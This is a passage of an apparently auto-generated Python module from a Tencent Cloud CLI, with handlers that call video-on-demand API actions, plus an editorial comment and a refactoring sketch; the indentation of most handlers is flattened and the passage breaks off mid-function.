fc33c0481541659ad0ca6611cdf36ceec3c0ad35 | 131,711 | py | Python | tccli/services/vod/vod_client.py | ivandksun/tencentcloud-cli-intl-en | 41b84e339918961b8bc92f7498e56347d21e16d3 | ["Apache-2.0"] | null | null | null | 1 | 2022-02-07T13:39:09.000Z | 2022-02-07T13:39:09.000Z | 4 | 2020-07-20T01:51:58.000Z | 2021-08-13T08:25:22.000Z
# -*- coding: utf-8 -*-
import os
import json
import tccli.options_define as OptionsDefine
import tccli.format_output as FormatOutput
from tccli import __version__
from tccli.utils import Utils
from tccli.exceptions import ConfigurationError
from tencentcloud.common import credential
from tencentcloud.common.profile.http_profile import HttpProfile
from tencentcloud.common.profile.client_profile import ClientProfile
from tencentcloud.vod.v20180717 import vod_client as vod_client_v20180717
from tencentcloud.vod.v20180717 import models as models_v20180717
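# NOTE (editorial): every doXxx handler below follows one generated template:
# (1) resolve global CLI options with parse_global_arg; (2) build a
# Credential plus HttpProfile/ClientProfile; (3) look up the versioned
# VodClient in CLIENT_MAP (defined elsewhere in this module); (4) turn the
# parsed CLI args into the matching *Request model from MODELS_MAP;
# (5) call the SDK method of the same name; (6) print the JSON response via
# FormatOutput.output. The try/except TypeError around json.loads exists
# because older Python 3 releases reject bytes there, so the response is
# decoded to UTF-8 first.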
def doCreateSnapshotByTimeOffsetTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateSnapshotByTimeOffsetTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateSnapshotByTimeOffsetTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
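# --- Hypothetical refactoring sketch (editorial, not generated code) ---
# Every handler in this file repeats the steps shown in
# doCreateSnapshotByTimeOffsetTemplate above. A single dispatcher could
# express the pattern once; it assumes the module-level parse_global_arg,
# CLIENT_MAP and MODELS_MAP that the generated handlers already rely on.
def _invoke_vod_action(action, args, parsed_globals):
    g_param = parse_global_arg(parsed_globals)
    cred = credential.Credential(
        g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
    )
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    client = CLIENT_MAP[g_param[OptionsDefine.Version]].VodClient(
        cred, g_param[OptionsDefine.Region], profile
    )
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = getattr(models, action + "Request")()      # e.g. EditMediaRequest()
    model.from_json_string(json.dumps(args))
    rsp = getattr(client, action)(model)               # e.g. client.EditMedia(model)
    result = rsp.to_json_string()
    try:
        json_obj = json.loads(result)
    except TypeError:
        json_obj = json.loads(result.decode('utf-8'))  # bytes on pre-3.6 Python
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])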
def doEditMedia(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.EditMediaRequest()
model.from_json_string(json.dumps(args))
rsp = client.EditMedia(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeVodDomains(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeVodDomainsRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeVodDomains(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doApplyUpload(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ApplyUploadRequest()
model.from_json_string(json.dumps(args))
rsp = client.ApplyUpload(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteAnimatedGraphicsTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteAnimatedGraphicsTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteAnimatedGraphicsTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeAIAnalysisTemplates(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeAIAnalysisTemplatesRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeAIAnalysisTemplates(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doPullEvents(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.PullEventsRequest()
model.from_json_string(json.dumps(args))
rsp = client.PullEvents(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doProcessMediaByProcedure(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ProcessMediaByProcedureRequest()
model.from_json_string(json.dumps(args))
rsp = client.ProcessMediaByProcedure(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteTranscodeTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteTranscodeTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteTranscodeTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTaskDetail(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeTaskDetailRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeTaskDetail(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeReviewDetails(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeReviewDetailsRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeReviewDetails(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeWordSamples(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeWordSamplesRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeWordSamples(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeStorageData(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeStorageDataRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeStorageData(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyAIAnalysisTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyAIAnalysisTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyAIAnalysisTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteProcedureTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteProcedureTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteProcedureTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteAdaptiveDynamicStreamingTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteAdaptiveDynamicStreamingTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteAdaptiveDynamicStreamingTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateAdaptiveDynamicStreamingTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateAdaptiveDynamicStreamingTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateAdaptiveDynamicStreamingTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeSampleSnapshotTemplates(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeSampleSnapshotTemplatesRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeSampleSnapshotTemplates(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteSnapshotByTimeOffsetTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteSnapshotByTimeOffsetTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteSnapshotByTimeOffsetTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeCdnLogs(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeCdnLogsRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeCdnLogs(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyClass(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyClassRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyClass(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTasks(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeTasksRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeTasks(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doResetProcedureTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ResetProcedureTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.ResetProcedureTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeCDNUsageData(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeCDNUsageDataRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeCDNUsageData(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateTranscodeTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateTranscodeTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateTranscodeTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeCDNStatDetails(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
